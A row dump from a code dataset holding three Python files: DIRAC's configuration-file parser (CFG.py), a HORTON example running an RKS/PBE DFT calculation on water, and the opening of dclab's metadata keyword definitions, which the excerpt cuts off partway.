text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
# $HeadURL$
__RCSID__ = "$Id$"
import types
import copy
import os
import string
import re
try:
import zipfile
gZipEnabled = True
except ImportError:
gZipEnabled = False
try:
from DIRAC.Core.Utilities import List, ThreadSafe
from DIRAC.Core.Utilities.ReturnValues import S_OK, S_ERROR
gCFGSynchro = ThreadSafe.Synchronizer( recursive = True )
except Exception:
#We're out of python, define required utilities
import threading
from types import StringTypes
def S_ERROR( messageString = '' ):
return { 'OK' : False, 'Message' : str( messageString ) }
def S_OK( value = '' ):
return { 'OK' : True, 'Value' : value }
class ListDummy:
def fromChar( self, inputString, sepChar = "," ):
if not ( type( inputString ) in StringTypes and
type( sepChar ) in StringTypes and
sepChar ): # to prevent getting an empty String as argument
return None
return [ fieldString.strip() for fieldString in inputString.split( sepChar ) if len( fieldString.strip() ) > 0 ]
List = ListDummy()
class Synchronizer:
""" Class enapsulating a lock
allowing it to be used as a synchronizing
decorator making the call thread-safe"""
def __init__( self, lockName = "", recursive = False ):
self.lockName = lockName
if recursive:
self.lock = threading.RLock()
else:
self.lock = threading.Lock()
def __call__( self, funcToCall ):
def lockedFunc( *args, **kwargs ):
try:
if self.lockName:
print "LOCKING", self.lockName
self.lock.acquire()
return funcToCall( *args, **kwargs )
finally:
if self.lockName:
print "UNLOCKING", self.lockName
self.lock.release()
return lockedFunc
gCFGSynchro = Synchronizer( recursive = True )
#END OF OUT OF DIRAC
#START OF CFG MODULE
class CFG( object ):
class Template( string.Template ):
idpattern = r'[\w/]+'
def __init__( self ):
"""
Constructor
"""
self.__orderedList = []
self.__commentDict = {}
self.__dataDict = {}
self.reset()
@gCFGSynchro
def reset( self ):
"""
Empty the CFG
"""
self.__orderedList = []
self.__commentDict = {}
self.__dataDict = {}
@gCFGSynchro
def createNewSection( self, sectionName, comment = "", contents = False ):
"""
Create a new section
@type sectionName: string
@param sectionName: Name of the section
@type comment: string
@param comment: Comment for the section
@type contents: CFG
@param contents: Optional cfg with the contents of the section.
"""
if sectionName == "":
raise ValueError( "Creating a section with empty name! You shouldn't do that!" )
if sectionName.find( "/" ) > -1:
recDict = self.getRecursive( sectionName, -1 )
if not recDict:
return S_ERROR( "Parent section does not exist %s" % sectionName )
parentSection = recDict[ 'value' ]
if type( parentSection ) in ( types.StringType, types.UnicodeType ):
raise KeyError( "Entry %s doesn't seem to be a section" % recDict[ 'key' ] )
return parentSection.createNewSection( recDict[ 'levelsBelow' ], comment, contents )
self.__addEntry( sectionName, comment )
if sectionName not in self.__dataDict:
if not contents:
self.__dataDict[ sectionName ] = CFG()
else:
self.__dataDict[ sectionName ] = contents
else:
raise KeyError( "%s key already exists" % sectionName )
return self.__dataDict[ sectionName ]
def __overrideAndCloneSection( self, sectionName, oCFGToClone ):
"""
Replace the contents of a section
@type sectionName: string
@params sectionName: Name of the section
@type oCFGToClone: CFG
@param oCFGToClone: CFG with the contents of the section
"""
if sectionName not in self.listSections():
raise KeyError( "Section %s does not exist" % sectionName )
self.__dataDict[ sectionName ] = oCFGToClone.clone()
@gCFGSynchro
def setOption( self, optionName, value, comment = "" ):
"""
Create a new option.
@type optionName: string
@param optionName: Name of the option to create
@type value: string
@param value: Value of the option
@type comment: string
@param comment: Comment for the option
"""
if optionName == "":
raise ValueError( "Creating an option with empty name! You shouldn't do that!" )
if optionName.find( "/" ) > -1:
recDict = self.getRecursive( optionName, -1 )
if not recDict:
return S_ERROR( "Parent section does not exist %s" % optionName )
parentSection = recDict[ 'value' ]
if type( parentSection ) in ( types.StringType, types.UnicodeType ):
raise KeyError( "Entry %s doesn't seem to be a section" % recDict[ 'key' ] )
return parentSection.setOption( recDict[ 'levelsBelow' ], value, comment )
self.__addEntry( optionName, comment )
self.__dataDict[ optionName ] = str( value )
def __addEntry( self, entryName, comment ):
"""
Add an entry and set the comment
@type entryName: string
@param entryName: Name of the entry
@type comment: string
@param comment: Comment for the entry
"""
if not entryName in self.__orderedList:
self.__orderedList.append( entryName )
self.__commentDict[ entryName ] = comment
def existsKey( self, key ):
"""
Check if an option/section with that name exists
@type key: string
@param key: Name of the option/section to check
@return: Boolean with the result
"""
return key in self.__orderedList
def sortAlphabetically( self, ascending = True ):
"""
Order this cfg alphabetically
returns True if modified
"""
if not ascending:
return self.sortByKey( reverse = True )
return self.sortByKey()
def sortByKey( self, key = None , reverse = False ):
"""
Order this cfg by function refered in key, default is None
corresponds to alphabetic sort
returns True if modified
"""
unordered = list( self.__orderedList )
self.__orderedList.sort( key = key , reverse = reverse )
return unordered != self.__orderedList
@gCFGSynchro
def deleteKey( self, key ):
"""
Delete an option/section
@type key: string
@param key: Name of the option/section to delete
@return: Boolean with the result
"""
result = self.getRecursive( key, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( key, "/" )[:-1] ) )
cfg = result[ 'value' ]
end = result[ 'levelsBelow' ]
if end in cfg.__orderedList:
del( cfg.__commentDict[ end ] )
del( cfg.__dataDict[ end ] )
cfg.__orderedList.remove( end )
return True
return False
@gCFGSynchro
def copyKey( self, oldName, newName ):
"""
Copy an option/section
@type oldName: string
@param oldName: Name of the option / section to copy
@type newName: string
@param newName: Destination name
@return: Boolean with the result
"""
if oldName == newName:
return True
result = self.getRecursive( oldName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( oldName, "/" )[:-1] ) )
oldCfg = result[ 'value' ]
oldEnd = result[ 'levelsBelow' ]
if oldEnd in oldCfg.__dataDict:
result = self.getRecursive( newName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( newName, "/" )[:-1] ) )
newCfg = result[ 'value' ]
newEnd = result[ 'levelsBelow' ]
newCfg.__dataDict[ newEnd ] = oldCfg.__dataDict[ oldEnd ]
newCfg.__commentDict[ newEnd ] = oldCfg.__commentDict[ oldEnd ]
refKeyPos = oldCfg.__orderedList.index( oldEnd )
newCfg.__orderedList.insert( refKeyPos + 1, newEnd )
return True
else:
return False
@gCFGSynchro
def listOptions( self, ordered = True ):
"""
List options
@type ordered: boolean
@param ordered: Return the options ordered. By default is False
@return: List with the option names
"""
if ordered:
return [ sKey for sKey in self.__orderedList if type( self.__dataDict[ sKey ] ) == types.StringType ]
else:
return [ sKey for sKey in self.__dataDict.keys() if type( self.__dataDict[ sKey ] ) == types.StringType ]
@gCFGSynchro
def listSections( self, ordered = True ):
"""
List subsections
@type ordered: boolean
@param ordered: Return the subsections ordered. By default is False
@return: List with the subsection names
"""
if ordered:
return [ sKey for sKey in self.__orderedList if type( self.__dataDict[ sKey ] ) != types.StringType ]
else:
return [ sKey for sKey in self.__dataDict.keys() if type( self.__dataDict[ sKey ] ) != types.StringType ]
@gCFGSynchro
def isSection( self, key ):
"""
Return if a section exists
@type key: string
@param key: Name to check
@return: Boolean with the results
"""
if key.find( "/" ) != -1:
keyDict = self.getRecursive( key, -1 )
if not keyDict:
return False
section = keyDict[ 'value' ]
if type( section ) in ( types.StringType, types.UnicodeType ):
return False
secKey = keyDict[ 'levelsBelow' ]
return section.isSection( secKey )
return key in self.__dataDict and type( self.__dataDict[ key ] ) not in ( types.StringType, types.UnicodeType )
@gCFGSynchro
def isOption( self, key ):
"""
Return if an option exists
@type key: string
@param key: Name to check
@return: Boolean with the results
"""
if key.find( "/" ) != -1:
keyDict = self.getRecursive( key, -1 )
if not keyDict:
return False
section = keyDict[ 'value' ]
if type( section ) in ( types.StringType, types.UnicodeType ):
return False
secKey = keyDict[ 'levelsBelow' ]
return section.isOption( secKey )
return key in self.__dataDict and type( self.__dataDict[ key ] ) == types.StringType
def listAll( self ):
"""
List all sections and options
@return: List with names of all options and subsections
"""
return self.__orderedList
def __recurse( self, pathList ):
"""
Explore recursively a path
@type pathList: list
@param pathList: List containing the path to explore
@return: Dictionary with the contents { key, value, comment }
"""
if pathList[0] in self.__dataDict:
if len( pathList ) == 1:
return { 'key' : pathList[0],
'value' : self.__dataDict[ pathList[0] ],
'comment' : self.__commentDict[ pathList[0] ] }
else:
return self.__dataDict[ pathList[0] ].__recurse( pathList[1:] )
else:
return False
@gCFGSynchro
def getRecursive( self, path, levelsAbove = 0 ):
"""
Get path contents
@type path: string
@param path: Path to explore recursively and get the contents
@type levelsAbove: integer
@param levelsAbove: Number of children levels in the path that won't be explored.
For instance, to explore all sections in a path except the last one use
levelsAbove = 1
@return: Dictionary containing:
key -> name of the entry
value -> content of the key
comment -> comment of the key
"""
pathList = [ dirName.strip() for dirName in path.split( "/" ) if not dirName.strip() == "" ]
levelsAbove = abs( levelsAbove )
if len( pathList ) - levelsAbove < 0:
return None
if len( pathList ) - levelsAbove == 0:
lBel = ""
if levelsAbove > 0:
lBel = "/".join( pathList[len( pathList ) - levelsAbove: ] )
return { 'key' : "", 'value' : self, 'comment' : "", 'levelsBelow' : lBel }
levelsBelow = ""
if levelsAbove > 0:
levelsBelow = "/".join( pathList[-levelsAbove:] )
pathList = pathList[:-levelsAbove]
retDict = self.__recurse( pathList )
if not retDict:
return None
retDict[ 'levelsBelow' ] = levelsBelow
return retDict
def getOption( self, opName, defaultValue = None ):
"""
Get option value with default applied
@type opName: string
@param opName: Path to the option to retrieve
@type defaultValue: optional (any python type)
@param defaultValue: Default value for the option if the option is not defined.
If the option is defined, the value will be returned casted to
the type of defaultValue if it is defined.
@return: Value of the option casted to defaultValue type, or defaultValue
"""
levels = List.fromChar( opName, "/" )
dataD = self.__dataDict
while len( levels ) > 0:
try:
dataV = dataD[ levels.pop( 0 ) ]
except KeyError:
return defaultValue
dataD = dataV
if type( dataV ) != types.StringType:
optionValue = defaultValue
else:
optionValue = dataV
#Return value if existing, defaultValue if not
if optionValue == defaultValue:
if defaultValue == None or type( defaultValue ) == types.TypeType:
return defaultValue
return optionValue
#Value has been returned from the configuration
if defaultValue == None:
return optionValue
#Casting to defaultValue's type
defaultType = defaultValue
if not type( defaultValue ) == types.TypeType:
defaultType = type( defaultValue )
if defaultType == types.ListType:
try:
return List.fromChar( optionValue, ',' )
except Exception:
return defaultValue
elif defaultType == types.BooleanType:
try:
return optionValue.lower() in ( "y", "yes", "true", "1" )
except Exception:
return defaultValue
else:
try:
return defaultType( optionValue )
except Exception:
return defaultValue
def getAsDict( self, path = "" ):
"""
Get the contents below a given path as a dict
@type path: string
@param path: Path to retrieve as dict
@return : Dictionary containing the data
"""
resVal = {}
if path:
reqDict = self.getRecursive( path )
if not reqDict:
return resVal
keyCfg = reqDict[ 'value' ]
if type( keyCfg ) in ( types.StringType, types.UnicodeType ):
return resVal
return keyCfg.getAsDict()
for op in self.listOptions():
resVal[ op ] = self[ op ]
for sec in self.listSections():
resVal[ sec ] = self[ sec ].getAsDict()
return resVal
@gCFGSynchro
def appendToOption( self, optionName, value ):
"""
Append a value to an option prepending a comma
@type optionName: string
@param optionName: Name of the option to append the value
@type value: string
@param value: Value to append to the option
"""
result = self.getRecursive( optionName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( optionName, "/" )[:-1] ) )
cfg = result[ 'value' ]
end = result[ 'levelsBelow' ]
if end not in cfg.__dataDict:
raise KeyError( "Option %s has not been declared" % end )
cfg.__dataDict[ end ] += str( value )
@gCFGSynchro
def addKey( self, key, value, comment, beforeKey = "" ):
"""
Add a new entry (option or section)
@type key: string
@param key: Name of the option/section to add
@type value: string/CFG
@param value: Contents of the new option/section
@type comment: string
@param comment: Comment for the option/section
@type beforeKey: string
@param beforeKey: Name of the option/section to add the entry above. By default
the new entry will be added at the end.
"""
result = self.getRecursive( key, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( key, "/" )[:-1] ) )
cfg = result[ 'value' ]
end = result[ 'levelsBelow' ]
if end in cfg.__dataDict:
raise KeyError( "%s already exists" % key )
cfg.__dataDict[ end ] = value
cfg.__commentDict[ end ] = comment
if beforeKey == "":
cfg.__orderedList.append( end )
else:
refKeyPos = cfg.__orderedList.index( beforeKey )
cfg.__orderedList.insert( refKeyPos, end )
@gCFGSynchro
def renameKey( self, oldName, newName ):
"""
Rename a option/section
@type oldName: string
@param oldName: Name of the option/section to change
@type newName: string
@param newName: New name of the option/section
@return: Boolean with the result of the rename
"""
if oldName == newName:
return True
result = self.getRecursive( oldName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( oldName, "/" )[:-1] ) )
oldCfg = result[ 'value' ]
oldEnd = result[ 'levelsBelow' ]
if oldEnd in oldCfg.__dataDict:
result = self.getRecursive( newName, -1 )
if not result:
raise KeyError( "%s does not exist" % "/".join( List.fromChar( newName, "/" )[:-1] ) )
newCfg = result[ 'value' ]
newEnd = result[ 'levelsBelow' ]
newCfg.__dataDict[ newEnd ] = oldCfg.__dataDict[ oldEnd ]
newCfg.__commentDict[ newEnd ] = oldCfg.__commentDict[ oldEnd ]
refKeyPos = oldCfg.__orderedList.index( oldEnd )
oldCfg.__orderedList.remove( oldEnd )
newCfg.__orderedList.insert( refKeyPos, newEnd )
del( oldCfg.__dataDict[ oldEnd ] )
del( oldCfg.__commentDict[ oldEnd ] )
return True
else:
return False
def __getitem__( self, key ):
"""
Get the contents of a section/option
@type key: string
@param key: Name of the section/option to retrieve
@return: String/CFG with the contents
"""
if key.find( "/" ) > -1:
subDict = self.getRecursive( key )
if not subDict:
return False
return subDict[ 'value' ]
return self.__dataDict[ key ]
def __iter__( self ):
"""
Iterate though the contents in order
"""
for key in self.__orderedList:
yield key
def __contains__( self, key ):
"""
Check if a key is defined
"""
return self.getRecursive( key )
def __str__( self ):
"""
Get a print friendly representation of the CFG
@return: String with the contents of the CFG
"""
return self.serialize()
def __repr__( self ):
"""
Get a print friendly representation of the CFG
@return: String with the contents of the CFG
"""
return self.serialize()
def __nonzero__( self ):
"""
CFGs are not zeroes! ;)
"""
return True
def __eq__( self, cfg ):
"""
Check CFGs
"""
if not self.__orderedList == cfg.__orderedList:
return False
for key in self.__orderedList:
if not self.__commentDict[ key ].strip() == cfg.__commentDict[ key ].strip():
return False
if not self.__dataDict[ key ] == cfg.__dataDict[ key ]:
return False
return True
@gCFGSynchro
def getComment( self, entryName ):
"""
Get the comment for an option/section
@type entryName: string
@param entryName: Name of the option/section
@return: String with the comment
"""
try:
return self.__commentDict[ entryName ]
except:
raise ValueError( "%s does not have any comment defined" % entryName )
@gCFGSynchro
def setComment( self, entryName, comment ):
"""
Set the comment for an option/section
@type entryName: string
@param entryName: Name of the option/section
@type comment: string
@param comment: Comment for the option/section
"""
if entryName in self.__orderedList:
self.__commentDict[ entryName ] = comment
return True
return False
@gCFGSynchro
def serialize( self, tabLevelString = "" ):
"""
Generate a human readable serialization of a CFG
@type tabLevelString: string
@param tabLevelString: Tab string to apply to entries before representing them
@return: String with the contents of the CFG
"""
indentation = " "
cfgString = ""
for entryName in self.__orderedList:
if entryName in self.__commentDict:
for commentLine in List.fromChar( self.__commentDict[ entryName ], "\n" ):
cfgString += "%s#%s\n" % ( tabLevelString, commentLine )
if entryName in self.listSections():
cfgString += "%s%s\n%s{\n" % ( tabLevelString, entryName, tabLevelString )
cfgString += self.__dataDict[ entryName ].serialize( "%s%s" % ( tabLevelString, indentation ) )
cfgString += "%s}\n" % tabLevelString
elif entryName in self.listOptions():
valueList = List.fromChar( self.__dataDict[ entryName ] )
if len( valueList ) == 0:
cfgString += "%s%s = \n" % ( tabLevelString, entryName )
else:
cfgString += "%s%s = %s\n" % ( tabLevelString, entryName, valueList[0] )
for value in valueList[1:]:
cfgString += "%s%s += %s\n" % ( tabLevelString, entryName, value )
else:
raise ValueError( "Oops. There is an entry in the order which is not a section nor an option" )
return cfgString
@gCFGSynchro
def clone( self ):
"""
Create a copy of the CFG
@return: CFG copy
"""
clonedCFG = CFG()
clonedCFG.__orderedList = copy.deepcopy( self.__orderedList )
clonedCFG.__commentDict = copy.deepcopy( self.__commentDict )
for option in self.listOptions():
clonedCFG.__dataDict[ option ] = self[ option ]
for section in self.listSections():
clonedCFG.__dataDict[ section ] = self[ section ].clone()
return clonedCFG
@gCFGSynchro
def mergeWith( self, cfgToMergeWith ):
"""
Generate a CFG by merging with the contents of another CFG.
@type cfgToMergeWith: CFG
@param cfgToMergeWith: CFG with the contents to merge with. This contents are more
preemtive than this CFG ones
@return: CFG with the result of the merge
"""
mergedCFG = CFG()
for option in self.listOptions():
mergedCFG.setOption( option,
self[ option ],
self.getComment( option ) )
for option in cfgToMergeWith.listOptions():
mergedCFG.setOption( option,
cfgToMergeWith[ option ],
cfgToMergeWith.getComment( option ) )
for section in self.listSections():
if section in cfgToMergeWith.listSections():
oSectionCFG = self[ section ].mergeWith( cfgToMergeWith[ section ] )
mergedCFG.createNewSection( section,
cfgToMergeWith.getComment( section ),
oSectionCFG )
else:
mergedCFG.createNewSection( section,
self.getComment( section ),
self[ section ].clone() )
for section in cfgToMergeWith.listSections():
if section not in self.listSections():
mergedCFG.createNewSection( section,
cfgToMergeWith.getComment( section ),
cfgToMergeWith[ section ] )
return mergedCFG
def getModifications( self, newerCfg, ignoreMask = None, parentPath = "" ):
"""
Compare two cfgs
@type newerCfg: CFG
@param newerCfg: Cfg to compare with
@type prefix: string
@param prefix: Internal use only
@return: A list of modifications
"""
modList = []
#Options
oldOptions = self.listOptions( True )
newOptions = newerCfg.listOptions( True )
for newOption in newOptions:
iPos = newerCfg.__orderedList.index( newOption )
newOptPath = "%s/%s" % ( parentPath, newOption )
if ignoreMask and newOptPath in ignoreMask:
continue
if newOption not in oldOptions:
modList.append( ( 'addOpt', newOption, iPos,
newerCfg[ newOption ],
newerCfg.getComment( newOption ) ) )
else:
modified = False
if iPos != self.__orderedList.index( newOption ):
modified = True
elif newerCfg[ newOption ] != self[ newOption ]:
modified = True
elif newerCfg.getComment( newOption ) != self.getComment( newOption ):
modified = True
if modified:
modList.append( ( 'modOpt', newOption, iPos,
newerCfg[ newOption ],
newerCfg.getComment( newOption ) ) )
for oldOption in oldOptions:
oldOptPath = "%s/%s" % ( parentPath, oldOption )
if ignoreMask and oldOptPath in ignoreMask:
continue
if oldOption not in newOptions:
modList.append( ( 'delOpt', oldOption, -1, '' ) )
#Sections
oldSections = self.listSections( True )
newSections = newerCfg.listSections( True )
for newSection in newSections:
iPos = newerCfg.__orderedList.index( newSection )
newSecPath = "%s/%s" % ( parentPath, newSection )
if ignoreMask and newSecPath in ignoreMask:
continue
if newSection not in oldSections:
modList.append( ( 'addSec', newSection, iPos,
str( newerCfg[ newSection ] ),
newerCfg.getComment( newSection ) ) )
else:
modified = False
if iPos != self.__orderedList.index( newSection ):
modified = True
elif newerCfg.getComment( newSection ) != self.getComment( newSection ):
modified = True
subMod = self[ newSection ].getModifications( newerCfg[ newSection ],
ignoreMask, newSecPath )
if subMod:
modified = True
if modified:
modList.append( ( 'modSec', newSection, iPos,
subMod,
newerCfg.getComment( newSection ) ) )
for oldSection in oldSections:
oldSecPath = "%s/%s" % ( parentPath, oldSection )
if ignoreMask and oldSecPath in ignoreMask:
continue
if oldSection not in newSections:
modList.append( ( 'delSec', oldSection, -1, '' ) )
return modList
def applyModifications( self, modList, parentSection = "" ):
"""
Apply modifications to a CFG
@type modList: List
@param modList: Modifications from a getModifications call
@return: True/False
"""
for modAction in modList:
action = modAction[0]
key = modAction[1]
iPos = modAction[2]
value = modAction[3]
if action == 'addSec':
if key in self.listSections():
return S_ERROR( "Section %s/%s already exists" % ( parentSection, key ) )
#key, value, comment, beforeKey = ""
value = CFG().loadFromBuffer( value )
comment = modAction[4].strip()
if iPos < len( self.__orderedList ):
beforeKey = self.__orderedList[ iPos ]
else:
beforeKey = ""
self.addKey( key, value, comment, beforeKey )
elif action == 'delSec':
if key not in self.listSections():
return S_ERROR( "Section %s/%s does not exist" % ( parentSection, key ) )
self.deleteKey( key )
elif action == 'modSec':
if key not in self.listSections():
return S_ERROR( "Section %s/%s does not exist" % ( parentSection, key ) )
comment = modAction[4].strip()
self.setComment( key, comment )
if value:
result = self[ key ].applyModifications( value, "%s/%s" % ( parentSection, key ) )
if not result[ 'OK' ]:
return result
if iPos >= len( self.__orderedList ) or key != self.__orderedList[ iPos ]:
prevPos = self.__orderedList.index( key )
del( self.__orderedList[ prevPos ] )
self.__orderedList.insert( iPos, key )
elif action == "addOpt":
if key in self.listOptions():
return S_ERROR( "Option %s/%s exists already" % ( parentSection, key ) )
#key, value, comment, beforeKey = ""
comment = modAction[4].strip()
if iPos < len( self.__orderedList ):
beforeKey = self.__orderedList[ iPos ]
else:
beforeKey = ""
self.addKey( key, value, comment, beforeKey )
elif action == "modOpt":
if key not in self.listOptions():
return S_ERROR( "Option %s/%s does not exist" % ( parentSection, key ) )
comment = modAction[4].strip()
self.setOption( key , value, comment )
if iPos >= len( self.__orderedList ) or key != self.__orderedList[ iPos ]:
prevPos = self.__orderedList.index( key )
del( self.__orderedList[ prevPos ] )
self.__orderedList.insert( iPos, key )
elif action == "delOpt":
if key not in self.listOptions():
return S_ERROR( "Option %s/%s does not exist" % ( parentSection, key ) )
self.deleteKey( key )
return S_OK()
#Functions to load a CFG
def loadFromFile( self, fileName ):
"""
Load the contents of the CFG from a file
@type fileName: string
@param fileName: File name to load the contents from
@return: This CFG
"""
if gZipEnabled and fileName.find( ".zip" ) == len( fileName ) - 4:
#Zipped file
zipHandler = zipfile.ZipFile( fileName )
nameList = zipHandler.namelist()
fileToRead = nameList[0]
fileData = zipHandler.read( fileToRead )
zipHandler.close()
else:
fd = file( fileName )
fileData = fd.read()
fd.close()
return self.loadFromBuffer( fileData )
@gCFGSynchro
def loadFromBuffer( self, data ):
"""
Load the contents of the CFG from a string
@type data: string
@param data: Contents of the CFG
@return: This CFG
"""
commentRE = re.compile( "^\s*#" )
self.reset()
levelList = []
currentLevel = self
currentlyParsedString = ""
currentComment = ""
for line in data.split( "\n" ):
line = line.strip()
if len( line ) < 1:
continue
if commentRE.match( line ):
currentComment += "%s\n" % line.replace( "#", "" )
continue
for index in range( len( line ) ):
if line[ index ] == "{":
currentlyParsedString = currentlyParsedString.strip()
currentLevel.createNewSection( currentlyParsedString, currentComment )
levelList.append( currentLevel )
currentLevel = currentLevel[ currentlyParsedString ]
currentlyParsedString = ""
currentComment = ""
elif line[ index ] == "}":
currentLevel = levelList.pop()
elif line[ index ] == "=":
lFields = line.split( "=" )
currentLevel.setOption( lFields[0].strip(),
"=".join( lFields[1:] ).strip(),
currentComment )
currentlyParsedString = ""
currentComment = ""
break
elif line[ index: index + 2 ] == "+=":
valueList = line.split( "+=" )
currentLevel.appendToOption( valueList[0].strip(), ", %s" % "+=".join( valueList[1:] ).strip() )
currentlyParsedString = ""
currentComment = ""
break
else:
currentlyParsedString += line[ index ]
return self
@gCFGSynchro
def loadFromDict( self, data ):
for k in data:
value = data[ k ]
vType = type( value )
if type( value ) == types.DictType:
self.createNewSection( k , "", CFG().loadFromDict( value ) )
elif vType in ( types.ListType, types.TupleType ):
self.setOption( k , ", ".join( value ), "" )
else:
self.setOption( k , str( value ), "" )
return self
def writeToFile( self, fileName ):
"""
Write the contents of the cfg to file
@type fileName: string
@param fileName: Name of the file to write the cfg to
@return: True/False
"""
try:
directory = os.path.dirname( fileName )
if directory and ( not os.path.exists( directory ) ):
os.makedirs( directory )
fd = file( fileName, "w" )
fd.write( str( self ) )
fd.close()
return True
except Exception:
return False
def __allOps( self ):
toExplore = [ ( "", self ) ]
while toExplore:
sPath, sObj = toExplore.pop( 0 )
if sPath:
sPath = "%s/" % sPath
for opName in sObj.listOptions():
yield ( sPath + opName, sObj[ opName ] )
for secName in sObj.listSections():
toExplore.append( ( sPath + secName ), sObj[ secName ] )
#Real expansion method
def __innerExpand( self ):
done = {}
for secName in self.listSections():
secDone = self[ secName ].__innerExpand()
for k in secDone:
done[ "%s/%s" % ( secName, k ) ] = secDone[ k ]
toExpand = {}
for opName in self.listOptions():
opValue = self[ opName ]
if opValue.find( CFG.Template.delimiter ) == -1:
done[ opName ] = opValue
continue
toExpand[ opName ] = opValue
modifications = 0
while True:
modified = {}
for opName in toExpand:
try:
newVal = CFG.Template( toExpand[ opName ] ).substitute( done )
except:
continue
modified[ opName ] = newVal
done[ opName ] = newVal
self.setOption( opName, newVal )
modifications += 1
if not modified:
break
for opN in modified:
toExpand.pop( opN )
return done
@gCFGSynchro
def expand( self ):
"""
Expand all options into themselves
a = something-$b
b = hello
will end up with
a = something-hello
b = hello
"""
self.__innerExpand()
return self
|
coberger/DIRAC
|
Core/Utilities/CFG.py
|
Python
|
gpl-3.0
| 33,826
|
[
"DIRAC"
] |
559848d5c6ddf08acd21206a4a62871dbd91ede4294f3f22e383e843b0354cac
|
#!/usr/bin/env python
#JSON {"lot": "RKS/6-31G*",
#JSON "scf": "CDIISSCFSolver",
#JSON "linalg": "CholeskyLinalgFactory",
#JSON "difficulty": 4,
#JSON "description": "Basic RKS DFT example with GGA exhange-correlation functional (PBE)"}
from horton import *
# Load the coordinates from file.
# Use the XYZ file from HORTON's test data directory.
fn_xyz = context.get_fn('test/water.xyz')
mol = IOData.from_file(fn_xyz)
# Create a Gaussian basis set
obasis = get_gobasis(mol.coordinates, mol.numbers, '6-31g*')
# Create a linalg factory
lf = CholeskyLinalgFactory(obasis.nbasis)
# Compute Gaussian integrals
olp = obasis.compute_overlap(lf)
kin = obasis.compute_kinetic(lf)
na = obasis.compute_nuclear_attraction(mol.coordinates, mol.pseudo_numbers, lf)
er = obasis.compute_electron_repulsion(lf)
# Define a numerical integration grid needed the XC functionals
grid = BeckeMolGrid(mol.coordinates, mol.numbers, mol.pseudo_numbers)
# Create alpha orbitals
exp_alpha = lf.create_expansion()
# Initial guess
guess_core_hamiltonian(olp, kin, na, exp_alpha)
# Construct the restricted HF effective Hamiltonian
external = {'nn': compute_nucnuc(mol.coordinates, mol.pseudo_numbers)}
terms = [
RTwoIndexTerm(kin, 'kin'),
RDirectTerm(er, 'hartree'),
RGridGroup(obasis, grid, [
RLibXCGGA('x_pbe'),
RLibXCGGA('c_pbe'),
]),
RTwoIndexTerm(na, 'ne'),
]
ham = REffHam(terms, external)
# Decide how to occupy the orbitals (5 alpha electrons)
occ_model = AufbauOccModel(5)
# Converge WFN with CDIIS SCF
# - Construct the initial density matrix (needed for CDIIS).
occ_model.assign(exp_alpha)
dm_alpha = exp_alpha.to_dm()
# - SCF solver
scf_solver = CDIISSCFSolver(1e-6)
scf_solver(ham, lf, olp, occ_model, dm_alpha)
# Derive orbitals (coeffs, energies and occupations) from the Fock and density
# matrices. The energy is also computed to store it in the output file below.
fock_alpha = lf.create_two_index()
ham.reset(dm_alpha)
ham.compute_energy()
ham.compute_fock(fock_alpha)
exp_alpha.from_fock_and_dm(fock_alpha, dm_alpha, olp)
# Assign results to the molecule object and write it to a file, e.g. for
# later analysis. Note that the CDIIS algorithm can only really construct an
# optimized density matrix and no orbitals.
mol.title = 'RKS computation on water'
mol.energy = ham.cache['energy']
mol.obasis = obasis
mol.exp_alpha = exp_alpha
mol.dm_alpha = dm_alpha
# useful for post-processing (results stored in double precision):
mol.to_file('water.h5')
|
crisely09/horton
|
data/examples/hf_dft/rks_water_gga.py
|
Python
|
gpl-3.0
| 2,495
|
[
"Gaussian"
] |
55ec9130ec4c001ce6c88fae67513e44913f816e9fc48176f1559b4dd9dcbd4a
|
import copy
from .meta_parse import fbool, fint, fintlist, func_types, lcstr
#: All configuration keywords editable by the user
CFG_ANALYSIS = {
# filtering parameters
"filtering": [
["hierarchy parent", str, "Hierarchy parent of the dataset"],
["remove invalid events", fbool, "Remove events with inf/nan values"],
["enable filters", fbool, "Enable filtering"],
["limit events", fint, "Upper limit for number of filtered events"],
["polygon filters", fintlist, "Polygon filter indices"],
],
# Addition user-defined data
"calculation": [
# "emodulus lut" was introduced in 0.32.0 and will replace
# the deprecated "emodulus model".
["emodulus lut", str, "Look-up table identifier"],
["emodulus model", lcstr, "Model [DEPRECATED]"],
["emodulus medium", str, "Medium used (e.g. CellCarrierB, water)"],
["emodulus temperature", float, "Chip temperature [°C]"],
["emodulus viscosity", float, "Viscosity [Pa*s] if 'medium' unknown"],
["crosstalk fl21", float, "Fluorescence crosstalk, channel 2 to 1"],
["crosstalk fl31", float, "Fluorescence crosstalk, channel 3 to 1"],
["crosstalk fl12", float, "Fluorescence crosstalk, channel 1 to 2"],
["crosstalk fl32", float, "Fluorescence crosstalk, channel 3 to 2"],
["crosstalk fl13", float, "Fluorescence crosstalk, channel 1 to 3"],
["crosstalk fl23", float, "Fluorescence crosstalk, channel 2 to 3"],
]
}
#: All read-only configuration keywords for a measurement
CFG_METADATA = {
# All parameters related to the actual experiment
"experiment": [
["date", str, "Date of measurement ('YYYY-MM-DD')"],
["event count", fint, "Number of recorded events"],
["run index", fint, "Index of measurement run"],
["sample", str, "Measured sample or user-defined reference"],
["time", str, "Start time of measurement ('HH:MM:SS[.S]')"],
],
# All special keywords related to RT-FDC
# This section should not be present for regular RT-DC measurements.
"fluorescence": [
# The baseline offset was introduced in 0.33.0. It is added to
# the trace data to obtain the actual signal used for data
# processing (e.g. obtaining the fl1_max feature). This is more
# robust than adding the offset directly to the trace data, because
# of the possibility of integer overflows. Furthermore, DCKit can
# set this parameter without modifying the original trace data
# to correct/remove negative trace data
# (see https://github.com/ZELLMECHANIK-DRESDEN/dclab/issues/101).
# Note that traces accessed from RTDCBase instances are never
# background-corrected!
["baseline 1 offset", fint, "Baseline offset channel 1"],
["baseline 2 offset", fint, "Baseline offset channel 2"],
["baseline 3 offset", fint, "Baseline offset channel 3"],
["bit depth", fint, "Trace bit depth"],
# If a fluorescence channel is used, a channel name *must* be
